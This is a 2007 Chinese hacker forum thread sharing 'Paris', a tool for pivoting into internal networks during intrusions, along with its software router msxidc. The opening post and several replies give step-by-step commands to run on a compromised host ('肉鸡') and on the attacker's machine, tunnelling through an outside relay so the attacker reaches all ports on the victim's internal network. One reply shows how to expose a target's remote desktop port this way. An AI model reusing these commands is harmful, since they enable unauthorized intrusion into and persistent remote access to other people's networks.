‹‹ 上一主题 | 下一主题 ››
发新话题
打印

[转载]高级内网渗透工具Paris (创建VPN)

教主

荣誉会员

Rank: 6Rank: 6Rank: 6

E.S.T论坛贵宾

帖子
49 
精华
8 
积分
563 
阅读权限
100 
性别
男 
在线时间
57 小时 
注册时间
2013-9-26 
最后登录
2008-7-1 
楼主 发表于 2007-10-27 22:04  只看该作者

[转载]高级内网渗透工具Paris (创建VPN)

信息来源:邪恶八进制信息安全团队(www.eviloctal.com

注:软件作者是rootkit.com.cn黑色技术成员组,首发邪恶八进制信息安全团队。

Paris/0.2.1 (01/14/2007)
研究成果:
www.rootkit.com.cn
www.horseb.org
软件作者:horseb (黑色技术成员组 www.rootkit.com.cn )

此工具能够让你在内网渗透中事半功倍.让你的计算机属于对方内网的状态。
使用方法:
目前流行的httptunnel其实还属于正向隧道,有WINDOWS OS的防火墙或ipsec端口过滤比较严格的话,没办法使用,而且现在的通道除了VPN比较可靠安全,其他都不可靠。

Paris经过使用比较安全可靠
目前主要有下面的用法:
1.入侵内网时,在能占领的出口或代理主机上运行softrouter,外网softrouter server 可以关联内网主机这样在外网就很方便的控制内网主机。
2. 如果内网有一些有特殊应用服务的主机,但是不能通过公司的路由器配置映射到外网的,这里可以通过这个软件把相应端口映射到外网,这样外网就可以使用内网上某些资源,比如web站点。

使用Paris 建立 VPN方法:
如何建立VPN
1。方案
在202.106.0.202# gateproxy.exe-P2380 STLS=fcl SERVER=socks
在192.168.1.12# gateproxy.exe -P1100 STLS=fsv SERVER=socks SOCKS=202.106.0.202:2380

内网IP 192.168.1.12

肉鸡IP 202.106.0.202

如果肉鸡的端口能正向连接的话可以做的
先在肉鸡上执行在202.106.0.202# gateproxy.exe-P2380 STLS=fcl SERVER=socks
然后再在自己的机器上执行gateproxy.exe -P1100 STLS=fsv SERVER=socks SOCKS=202.106.0.202:2380

这样你的网络192.168.1.12 就可以访问 202.106.0.202 这台机器对应的内网的所有机器的所有端口了


2.方案2
在202.106.0.202# gateproxy.exe-P2380 STLS=fcl SERVER=socks
在202.106.0.202# msxidc.exe -l127.0.0.1 -p2380 -m99 -s218.155.0.1 -r9001
在192.168.1.12# gateproxy.exe -P1100 STLS=fsv SERVER=socks SOCKS=218.155.0.1:99

这里说明一下,这里的msxidc.exe程序是Rootkit.com.cn 的软件路由程序
这里是为了解决肉鸡IP 202.106.0.202封正向端口的情况的,如果肉鸡IP 202.106.0.202:2380端口
连不上的话,就要用msxidc.exe把202.106.0.202:2380转到218.155.0.1:99的端口上,我们连接
218.155.0.1:99就等于连接上了肉鸡IP 202.106.0.202:2380了,这样就通过218.155.0.1:99端口
中转建立了和肉鸡202.106.0.202:2380的SSL VPN了
这里的218.155.0.1:9001 是softrouter的另外一个转发的侦听服务的端口

注意:这里必须要按照以上命令序列执行,否则不能连接上

附软件路由器的其他使用语法:
$$$$$$$$$$ software router version 0.01 $$$$$$$$$$$$$$

$$$$$$$$$$ copyright@2005 horse_b $$$$$$$$$$$$$$$$$$

msxidc -lVIM_IP -pVIMHOST_PORT -mMAP_MSvIDCs_PORT -sMSvIDCs_IP -rMSvIDCs_PORT

example:msxidc -l10.0.0.1 -p1433 -m99 -s218.155.0.1 -r9001


内网要连到外面的主机 10.0.0.1 这台内网主机要提供给外网的服务端口 1433 在外网上映射成的端口99 外网softrouterserver 的IP218.155.0.1 外网softrouterserver 的PORT 9001

这样我们就能在外网访问 218.155.0.1:99 就随时访问内网的 10.0.0.1:1433

msxidc -MMAP_MSvIDCs_PORT -SMSvIDCs_IP -RMSvIDCs_PORT

example:msxidc -M99 -S218.155.0.1 -R9001

msxidc -PLOCALHOST_PORT -XMAP_MSvIDCs_PORT -YMSvIDCs_IP -ZMSvIDCs_PORT

example:msxidc -P1433 -X99 -Y218.155.0.1 -Z9001
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$

转载请保留版权:

www.rootkit.com.cn
www.horseb.org
软件作者:horseb (黑色技术成员组 www.rootkit.com.cn )

附件

softrouter_release.RAR (1.13 MB)

2007-10-27 22:04, 下载次数: 2477

WebSite: http://www.rootkit.com.cn 年少的时候有一段时间,一直想表现自己彪悍的一面,于是想纹身,最终没有实施的原因是:我一直在犹豫是纹蜡笔小新好,还是纹铁臂阿童木好。

TOP

教主

荣誉会员

Rank: 6Rank: 6Rank: 6

E.S.T论坛贵宾

帖子
49 
精华
8 
积分
563 
阅读权限
100 
性别
男 
在线时间
57 小时 
注册时间
2013-9-26 
最后登录
2008-7-1 
沙发 发表于 2007-10-27 22:04  只看该作者
占位更新。
最好用方案2,大部分的内网都能搞定,装上SSL VPN。。。

如果哪位朋友有条件的话做个录象DEMO上来给大家学习下。谢谢。。
本来是内部论坛使用的。但还是放出来了。。。。
WebSite: http://www.rootkit.com.cn 年少的时候有一段时间,一直想表现自己彪悍的一面,于是想纹身,最终没有实施的原因是:我一直在犹豫是纹蜡笔小新好,还是纹铁臂阿童木好。

TOP

asm

运维管理组

Rank: 7Rank: 7Rank: 7Rank: 7

E.S.T论坛版主

帖子
1595 
精华
30 
积分
8741 
阅读权限
150 
性别
男 
在线时间
951 小时 
注册时间
2006-9-21 
最后登录
2008-7-9 
椅子 发表于 2007-10-27 22:50  只看该作者
  一条tsweb牛B烘烘的通杀内网,不带喘气的.
游戏吧  http://www.game8.cc/MyBlog    http://www.asm32.cn

TOP

某牛人

晶莹剔透§烈日灼然

Rank: 1

帖子
28 
精华
0 
积分
82 
阅读权限
40 
在线时间
55 小时 
注册时间
2006-3-2 
最后登录
2007-11-11 
板凳 发表于 2007-10-27 22:50  只看该作者
我先声明,我没有看楼主的软件
我只是对楼主的描述,作我自己的评论

其实这种解决还是不够完美的。
因为机器上的防火墙或者策略内的,完全可能封端口,封对外连接,封协议。
而且楼主的东西,一次只能对一个端口,是不灵活的。

其实相对最完美的访问内网的方式莫过于一个类似的SOCK5代理+各种协议的通讯了。
但是这个sock5的代理,并不是通过TCP来连接。
而是可以通过各种协议,包括自定义IP包来通讯。
而且我已经把这个东西给实现了。各个模块都不难,只是耗了我很多时间而已。

TOP

教主

荣誉会员

Rank: 6Rank: 6Rank: 6

E.S.T论坛贵宾

帖子
49 
精华
8 
积分
563 
阅读权限
100 
性别
男 
在线时间
57 小时 
注册时间
2013-9-26 
最后登录
2008-7-1 
地板 发表于 2007-10-27 22:57  只看该作者
.

试下用上面说的第2种方式.你就会豁然开朗
WebSite: http://www.rootkit.com.cn 年少的时候有一段时间,一直想表现自己彪悍的一面,于是想纹身,最终没有实施的原因是:我一直在犹豫是纹蜡笔小新好,还是纹铁臂阿童木好。

TOP

凋凌玫瑰

荣誉会员

Rank: 6Rank: 6Rank: 6

E.S.T论坛贵宾

帖子
79 
精华
12 
积分
3853 
阅读权限
100 
性别
男 
在线时间
55 小时 
注册时间
2006-2-26 
最后登录
2008-7-2 
6楼 发表于 2007-10-28 19:01  只看该作者
算了,用得着搞这么复杂么。

TOP

pt007

荣誉会员

Rank: 6Rank: 6Rank: 6

E.S.T论坛贵宾

帖子
209 
精华
30 
积分
3816 
阅读权限
100 
性别
男 
在线时间
432 小时 
注册时间
2005-9-9 
最后登录
2008-7-9 
7楼 发表于 2007-10-28 20:23  只看该作者
波波真是好同志啊,我下周上班拿茶叶去骗他的好东西,HEHE
每个人都有属于自已的世界,人生因此而精彩,HACK就是我的世界!

TOP

b0r3d

晶莹剔透§烈日灼然

Rank: 1

帖子
33 
精华
0 
积分
93 
阅读权限
40 
在线时间
17 小时 
注册时间
2007-3-13 
最后登录
2008-6-8 
8楼 发表于 2007-10-29 03:40  只看该作者
在服务器上面运行OK,在我本机上面就出错了。。
复制内容到剪贴板
代码:
B:\softrouter_release>gateproxy -p1100 STLS=fsv SERVER=socks SOCKS=218.155.0.1:9
9
(WIN) 40:10.671 [1532] #### send_file (1532,1)[1820,7] -> 1532[1720,0] (0,Err=87
)
(WIN) 40:10.671 [1532] #### file to be sent fd=1 -> 0 5FC0000 100401152

Config: WindowsNT; FileSize-Bits=64/64,32/32,32
Paris/0.2.1 (01/14/2007)
FreeSoft Create by [url]www.horseb.org[/url]
common proxy server software <Paris>
Crack & Make & Create by horse_b
--
FTP: <URL:[url]http://www.horseb.org/dl/Paris.rar[/url]>
WWW: <URL:[url]http://www.horseb.org/[/url]>
Mail:<URL:mailto:winddk64@horseb.org>
   <URL:[url]http://www.horseb.org/feedback/[/url]>
DGROOT=
ADMIN=horseb@gmail.cn
... testing ports to be used [] ...
Trying to start as a service [ParisProxy Server -P] ...
The service `ParisProxy Server -P&#39; exists. Delete it ? [y] / n : y
OK. DELETEd the previous service.
Create a new service ? [y] / n : y
Set Automatic Start on System Startup ? [y] / n : y
OK. The service is created successfully.
OK. Parameters are saved in registry:
"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ParisProxy-P\Parameters"
OK. Environments are saved in registry:
"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ParisProxy-P\Environments"

######## ERROR. The service failed to start (3).

TOP

micktom

晶莹剔透§烈日灼然

Rank: 1

帖子
精华
0 
积分
16 
阅读权限
40 
在线时间
37 小时 
注册时间
2007-1-23 
最后登录
2008-5-28 
9楼 发表于 2007-10-30 15:13  只看该作者
我按照方法1 都运行成功了,但是下一步怎么做呢,我ping 内网的机器没响应啊

TOP

qq998

晶莹剔透§烈日灼然

Rank: 1

帖子
精华
0 
积分
23 
阅读权限
40 
性别
男 
在线时间
59 小时 
注册时间
2006-9-15 
最后登录
2008-7-7 
10楼 发表于 2007-10-31 12:16  只看该作者
根本无法用。无法生存新网卡。ip

TOP

sunwear

团队执行官

Rank: 8Rank: 8

E.S.T核心成员

帖子
3777 
精华
70 
积分
18704 
阅读权限
200 
性别
男 
来自
天津 
在线时间
1639 小时 
注册时间
2004-8-16 
最后登录
2008-7-9 

优秀管理奖 原创技术奖 核心建议奖 资料收集奖

11楼 发表于 2007-11-2 09:48  只看该作者
引用:
引用第10楼2264964于2007-11-01 10:27发表的 :
靠楼主是个SB绑了木马!瑞星报毒!
这个工具自身就可以被列为病毒,应该归类为hacktool.
黑客软件都有可能自身就被列为病毒,像溢出程序,注入工具.你最好是把报的毒的类型名以及你分析结果发上来,如果证据充足才能认定楼主为SB.否则乱说的话,可能大家会认为你........

TOP

cchhd

晶莹剔透§烈日灼然

Rank: 1

帖子
65 
精华
0 
积分
154 
阅读权限
40 
性别
男 
在线时间
221 小时 
注册时间
2007-10-18 
最后登录
2008-7-8 
12楼 发表于 2007-11-3 00:34  只看该作者
- 检查额外的数据......   
- 检查寄生(被注射)数据.....      

-> 发现 E0h 额外的字节,开始补偿于 104400h

那意味着:
文件包括额外的数据 224 字节。
缩短大小约为 1041 KB。

你可能现在尝试弄干净文件。     






沒毒

TOP

pt007

荣誉会员

Rank: 6Rank: 6Rank: 6

E.S.T论坛贵宾

帖子
209 
精华
30 
积分
3816 
阅读权限
100 
性别
男 
在线时间
432 小时 
注册时间
2005-9-9 
最后登录
2008-7-9 
13楼 发表于 2007-11-8 12:13  只看该作者
1、利用软件路由msxidc软件来反弹内网端口的方法,经本人的实际测试该软件比LCX的那个要稳定,据作者horseb说曾经下载了几G的数据都没有断掉,牛人就是牛人:
//下面的例子是通过肉机上210.51.XX.XX的80来访问目标机的3389端口
肉机210.51.XX.XX:mapserver -p22
目标机:msxidc -l127.0.0.1 -p3389 -m80 -s210.51.XX.XX -r22 //然后连接210.51.XX.XX的80端口

2、正向建立VPN连接:
目标机:gateproxy.exe -P22 STLS=fcl SERVER=socks
本机:gateproxy.exe -P1100 STLS=fsv SERVER=socks SOCKS=210.51.XX:22
然后请将目标机IP地址加入到默认网关当中,并且设置好跳数
每个人都有属于自已的世界,人生因此而精彩,HACK就是我的世界!

TOP

lafkkk

禁止发言

帖子
31 
精华
0 
积分
75 
阅读权限
在线时间
42 小时 
注册时间
2007-8-24 
最后登录
2008-7-1 
14楼 发表于 2007-12-27 18:49  只看该作者
提示: 作者被禁止或删除 内容自动屏蔽

TOP

gxm

荣誉会员

Rank: 6Rank: 6Rank: 6

帖子
43 
精华
0 
积分
3206 
阅读权限
100 
性别
男 
在线时间
29 小时 
注册时间
2007-1-13 
最后登录
2008-6-30 
15楼 发表于 2008-1-6 16:16  只看该作者
教主还是把工具放出来了,呵呵。在黑色内部论坛的时候,我当时就测试了。绝对稳定,西西

TOP

‹‹ 上一主题 | 下一主题 ››
发新话题